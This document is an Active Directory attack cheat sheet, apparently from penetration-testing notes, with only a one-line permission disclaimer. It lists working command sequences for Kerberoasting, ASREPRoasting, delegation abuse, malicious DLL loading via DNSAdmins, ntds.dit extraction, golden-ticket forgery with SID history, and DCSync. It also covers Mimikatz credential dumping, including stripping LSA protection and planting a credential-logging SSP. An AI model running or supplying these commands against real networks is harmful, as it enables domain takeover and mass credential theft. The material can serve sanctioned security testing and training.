Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
All standard domain users can request a copy of all service accounts along with their correlating password hashes, so we can ask a TGS for any SPN that is bound to a "user"account, extract the encrypted blob that was encrypted using the user's password and bruteforce it offline.
Using PowerView:
#Get User Accounts that are used as Service AccountsGet-NetUser-SPN#Get every available SPN account, request a TGS and dump its hashInvoke-Kerberoast#Requesting the TGS for a single account:Request-SPNTicket#Export all tickets using MimikatzInvoke-Mimikatz-Command '"kerberos::list /export"'
Using PowerShell AD Module:
#Get User Accounts that are used as Service AccountsGet-ADUser-Filter {ServicePrincipalName -ne"$null"} -Properties ServicePrincipalName
#Kerberoasting and outputing on a file with a spesific format
Rubeus.exe kerberoast /outfile:$Out_File /domain:$DomainName
#Kerberoasting whle being "OPSEC" safe, essentially while not try to roast AES enabled accounts
Rubeus.exe kerberoast /outfile:$Out_File /domain:$DomainName /rc4opsec
#Kerberoast AES enabled accounts
Rubeus.exe kerberoast /outfile:$Out_File /domain:$DomainName /aes
#Kerberoast spesific user account
Rubeus.exe kerberoast /outfile:$Out_File /domain:$DomainName /user:$UserName /simple
#Kerberoast by specifying the authentication credentials
Rubeus.exe kerberoast /outfile:$Out_File /domain:$DomainName /creduser:$UserName> /credpassword:$Password>
ASREPRoast
If a domain user account do not require kerberos preauthentication, we can request a valid TGT for this account without even having domain credentials, extract the encryptedblob and bruteforce it offline.
AD Module: Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
Forcefully Disable Kerberos Preauth on an account I have Write permissions or more! Check for interesting permissions on accounts:
We add a filter (e.g. RDPUsers) to get "User Accounts" not Machine Accounts, because Machine Account hashes are not crackable!
Using PowerView:
Invoke-ACLScanner-ResolveGUIDs |?{$_.IdentinyReferenceName-match"RDPUsers"}#Disable Kerberos Preauth:Set-DomainObject-Identity $UserAccount -XOR@{useraccountcontrol=4194304} -Verbose#Check if the value changed:Get-DomainUser-PreauthNotRequired -Verbose
And finally execute the attack using the ASREPRoast tool.
#Get a specific Account's hash:Get-ASREPHash-UserName $UserName -Verbose#Get any ASREPRoastable Users' hashes:Invoke-ASREPRoast-Verbose
Using Rubeus:
#For $Format choose either hashcat or john
#Trying the attack for all domain users
Rubeus.exe asreproast /format:$Format /domain:$DomainName /outfile:$Out_File
#ASREPRoast a specific user
Rubeus.exe asreproast /user:$UserName /format:$Format /domain:$DomainName /outfile:$Out_File
#ASREPRoast users of a specific OU (Organization Unit)
Rubeus.exe asreproast /ou:$OU_Name /format:$Format /domain:$DomainName /outfile:$Out_File
Using Impacket:
#Trying the attack for the specified users on the filepython GetNPUsers.py $DomainName/-usersfile $Users_File -outputfile $Out_File
Password Spray Attack
If we have harvest some passwords by compromising a user account, we can use this method to try and exploit password reuse on other domain accounts.
If we have enough permissions -> GenericAll/GenericWrite we can set a SPN on a target account, request a TGS, then grab its blob and brute force it.
Using PowerView:
#Check for interesting permissions on accounts:Invoke-ACLScanner-ResolveGUIDs |?{$_.IdentinyReferenceName-match"RDPUsers"}#Check if current user has already an SPN setted:Get-DomainUser-Identity $UserName | select serviceprincipalname#Force set the SPN on the account:Set-DomainObject $UserName -Set @{serviceprincipalname='ops/whatever1'}
Using PowerShell AD Module:
#Check if current user has already an SPN settedGet-ADUser-Identity $UserName -Properties ServicePrincipalName | select ServicePrincipalName#Force set the SPN on the account:Set-ADUser-Identiny $UserName -ServicePrincipalNames @{Add='ops/whatever1'}
Finally use any tool from before to grab the hash and Kerberoast it!
Abusing Shadow Copies
If you have local administrator access on a machine try to list shadow copies, it's an easy way for Domain Escalation.
#List shadow copies using vssadmin (Needs Admnistrator Access)
vssadmin list shadows
#List shadow copies using diskshadow
diskshadow list shadows all
#Make a symlink to the shadow copy and access it
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
You can dump the backed-up SAM database and harvest credentials.
Look for DPAPI stored creds and decrypt them.
Access backed-up sensitive files.
List and Decrypt Stored Credentials using Mimikatz
Usually encrypted credentials are stored in:
%appdata%\Microsoft\Credentials
%localappdata%\Microsoft\Credentials
#By using the cred function of mimikatz we can enumerate the cred object and get information about it:
dpapi::cred /in:"%appdata%\Microsoft\Credentials\$CredHash"
#From the previous command we are interested to the "guidMasterKey" parameter, that tells us which masterkey was used to encrypt the credential
#Lets enumerate the Master Key:
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\$UserSID\$MasterKeyGUID"
#Now if we are on the context of the user (or system) that the credential belogs to, we can use the /rpc flag to pass the decryption of the masterkey to the domain controler:
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\$UserSID\$MasterKeyGUID" /rpc
#We now have the masterkey in our local cache:
dpapi::cache
#Finally we can decrypt the credential using the cached masterkey:
dpapi::cred /in:"%appdata%\Microsoft\Credentials\$CredHash"
If we have Administrative access on a machine that has Unconstrained Delegation enabled, we can wait for a high value target or DA to connect to it, steal his TGT then ptt and impersonate him!
Using PowerView:
#Discover domain joined computers that have Unconstrained Delegation enabledGet-NetComputer-UnConstrained#List tickets and check if a DA or some High Value target has stored its TGTInvoke-Mimikatz-Command '"sekurlsa::tickets"'#Command to monitor any incoming sessions on our compromised serverInvoke-UserHunter-ComputerName $ComputerName -Poll $Num_Seconds -UserName $UserName -Delay $WaitInterval -Verbose#Dump the tickets to disk:Invoke-Mimikatz-Command '"sekurlsa::tickets /export"'#Impersonate the user using ptt attack:Invoke-Mimikatz-Command '"kerberos::ptt $Ticket_Path"'
Note: We can also use Rubeus!
Constrained Delegation
Using PowerView and Kekeo:
#Enumerate Users and Computers with constrained delegationGet-DomainUser-TrustedToAuthGet-DomainComputer-TrustedToAuth
After enumeration, request the TGT using kekeo
#If we have a user that has Constrained delegation, we ask for a valid tgt of this user using kekeo
tgt::ask /user:$UserName /domain:$Domain_FQDN /rc4:$Password_Hash
#Then using the TGT we have ask a TGS for a Service this user has Access to through constrained delegation
tgs::s4u /tgt:$TGT_Path /user:$UserToImpersonate@$Domain_FQDN /service:$Service_SPN
#Finally use mimikatz to ptt the TGS
Invoke-Mimikatz -Command '"kerberos::ptt $TGS_Path"'
Now we can access the service as the impersonated user!
🚩 What if we have delegation rights for only a specific SPN? (e.g TIME):
In this case we can still abuse a feature of Kerberos called "alternative service". This allows us to request TGS tickets for other "alternative" services and not only for the one we have rights for. That gives us the leverage to request valid tickets for any service we want that the host supports, giving us full access over the target machine.
Resource Based Constrained Delegation
If we have GenericALL/GenericWrite privileges on a machine account object of a domain, we can abuse it and impersonate ourselves as any user of the domain to it. For example we can impersonate Domain Administrator and have complete access.
First we need to enter the security context of the user/machine account that has the privileges over the object. If it is a user account we can use Pass the Hash, RDP, PSCredentials etc.
Exploitation Example:
#Import Powermad and use it to create a new MACHINE ACCOUNT. .\Powermad.ps1New-MachineAccount -MachineAccount $MachineAccountName -Password $(ConvertTo-SecureString 'p@ssword!' -AsPlainText -Force) -Verbose
#Import PowerView and get the SID of our new created machine account. .\PowerView.ps1$ComputerSid =Get-DomainComputer $MachineAccountName -Properties objectsid | Select -Expand objectsid#Then by using the SID we are going to build an ACE for the new created machine account using a raw security descriptor:
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes =New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes,0)#Next, we need to set the security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we're taking over, again using PowerView
Get-DomainComputer TargetMachine | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
After that we need to get the RC4 hash of the new machine account's password using Rubeus
Rubeus.exe hash /password:'p@ssword!'
#TODO: Fix these last two examples (Domain and computername needed?)
#And for this example, we are going to impersonate Domain Administrator on the cifs service of the target computer using Rubeus
Rubeus.exe s4u /user:$MachineAccountName /rc4:$RC4HashOfMachineAccountPassword /impersonateuser:Administrator /msdsspn:cifs/TargetMachine.wtver.domain /domain:$Domain_FQDN /ptt
#Finally we can access the C$ drive of the target machine
dir \\TargetMachine.wtver.domain\C$
❗ In Constrain and Resource-Based Constrained Delegation if we don't have the password/hash of the account with TRUSTED_TO_AUTH_FOR_DELEGATION that we try to abuse, we can use the very nice trick "tgt::deleg" from kekeo or "tgtdeleg" from rubeus and fool Kerberos to give us a valid TGT for that account. Then we just use the ticket instead of the hash of the account to perform the attack.
If a user is a member of the DNSAdmins group, he can possibly load an arbitary DLL with the privileges of dns.exe that runs as SYSTEM. In case the DC serves a DNS, the user can escalate his privileges to DA. This exploitation process needs privileges to restart the DNS service to work.
Once we found a member of this group we need to compromise it (There are many ways).
Then by serving a malicious DLL on a SMB share and configuring the dll usage,we can escalate our privileges:
#Using dnscmd:
dnscmd <NameOfDNSMAchine> /config /serverlevelplugindll \\Path\To\Our\Dll\malicious.dll
#Restart the DNS Service:
sc \\DNSServer stop dns
sc \\DNSServer start dns
If we manage to compromise a user account that is member of the Backup Operators group, we can then abuse it's SeBackupPrivilege to create a shadow copy of the current state of the DC, extract the ntds.dit database file, dump the hashes and escalate our privileges to DA.
Once we have access on an account that has the SeBackupPrivilege we can access the DC and create a shadow copy using the signed binary diskshadow:
Create a .txt file that will contain the shadow copy process script
set context persistent nowriters
set metadata c:\windows\system32\spool\drivers\color\example.cab
set verbose on
begin backup
add volume c: alias mydrive
create
expose %mydrive% w:
end backup
2. Next, Execute diskshadow with our script as a parameter
diskshadow /s script.txt
3. Next, you need to access the shadow copy. even if you have the SeBackupPrivilege you cannot simply copy ntds.dit. You will need to mimic backup software and use Win32 API calls to copy it on an accessible folder. For this we are going to build a malicious dll from this amazing repo and use it to abuse SeBackupPrivilege.
#Importing both dlls from the repo using powershellImport-Module .\SeBackupPrivilegeCmdLets.dllImport-Module .\SeBackupPrivilegeUtils.dll#Checking if the SeBackupPrivilege is enabledGet-SeBackupPrivilege#If it isn't we enable itSet-SeBackupPrivilege#Use the functionality of the dlls to copy the ntds.dit database file from the shadow copy to a location of our choiceCopy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\<PathToSave>\ntds.dit -Overwrite#Dump the SYSTEM hivereg save HKLM\SYSTEM c:\temp\system.hive
4. Using smbclient.py from impacket or some other tool copy ntds.dit and the SYSTEM hive to your local machine.
5. Use secretsdump.py from impacket and dump the hashes.
6. Use psexec or another tool of your choice to pass-the-hash and get Domain Admin access.
If we manage to compromise a child domain of a forest andSID filteringisn't enabled (most of the times is not), we can abuse it to privilege escalate to Domain Administrator of the root domain of the forest. This is possible because of theSID Historyfield on a kerberos TGT ticket, that defines the "extra" security groups and privileges.
Exploitation example:
#Get the SID of the Current Domain using PowerView
Get-DomainSID -Domain current.root.domain.local
#Get the SID of the Root Domain using PowerView
Get-DomainSID -Domain root.domain.local
#Create the Enteprise Admins SID
Format: RootDomainSID-519
#Forge "Extra" Golden Ticket using mimikatz
kerberos::golden /user:Administrator /domain:current.root.domain.local /sid:<CurrentDomainSID> /krbtgt:<krbtgtHash> /sids:<EnterpriseAdminsSID> /startoffset:0 /endin:600 /renewmax:10080 /ticket:\path\to\ticket\golden.kirbi
#Inject the ticket into memory
kerberos::ptt \path\to\ticket\golden.kirbi
#List the DC of the Root Domain
dir \\dc.root.domain.local\C$
#Or DCsync and dump the hashes using mimikatz
lsadump::dcsync /domain:root.domain.local /all
SharpZeroLogon: C# implementation of the Zerologon exploit.
Invoke-ZeroLogon: Powershell implementation of the Zerologon exploit.
Zer0Dump: Python implementation of the Zerologon exploit using the impacket library.
Mimikatz
#The commands below are shown in Cobalt Strike format#Dump LSASS:mimikatzprivilege::debugmimikatztoken::elevatemimikatzsekurlsa::logonpasswords#(Over) Pass The Hashmimikatzprivilege::debugmimikatzsekurlsa::pth/user:$UserName /ntlm:$NTLM_Hash /domain:$Domain_FQDN#List all available kerberos tickets in memorymimikatzsekurlsa::tickets#Dump local Terminal Services credentialsmimikatzsekurlsa::tspkg#Dump and save LSASS in a filemimikatzsekurlsa::minidumpc:\temp\lsass.dmp#List cached MasterKeysmimikatzsekurlsa::dpapi#List local Kerberos AES Keysmimikatzsekurlsa::ekeys#Dump SAM Databasemimikatzlsadump::sam#Dump SECRETS Databasemimikatzlsadump::secrets#Inject and dump the Domain Controler's Credentialsmimikatzprivilege::debugmimikatztoken::elevatemimikatzlsadump::lsa/inject#Dump the Domain's Credentials without touching DC's LSASS and also remotelymimikatzlsadump::dcsync/domain:$Domain_FQDN /all#List and Dump local kerberos credentialsmimikatzkerberos::list/dump#Pass The Ticketmimikatzkerberos::ptt $KirbiFile_Path#List TS/RDP sessionsmimikatzts::sessions#List Vault credentialsmimikatzvault::list
If mimikatz fails to dump credentials because of LSA Protection controls, there are two workarounds:
LSA as a Protected Process
#Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set to 0x1
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa
#Next upload the mimidriver.sys from the official mimikatz repo to same folder of your mimikatz.exe
#Now lets import the mimidriver.sys to the system
mimikatz # !+
#Now lets remove the protection flags from lsass.exe process
mimikatz # !processprotect /process:lsass.exe /remove
#Finally run the logonpasswords function to dump lsass
mimikatz # sekurlsa::logonpasswords
LSA is running as virtualized process (LSAISO) by Credential Guard
First, check if a process called lsaiso.exe is running.
tasklist | findstr lsaiso
If lsaiso.exe is running there isn't a way to dump lsass, as we will only get encrypted data. However, you can still use keyloggers or clipboard dumpers to capture data. For example, you can use the malicious Security Support Provider provided by mimikatz.
mimikatz # misc::memssp
Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log
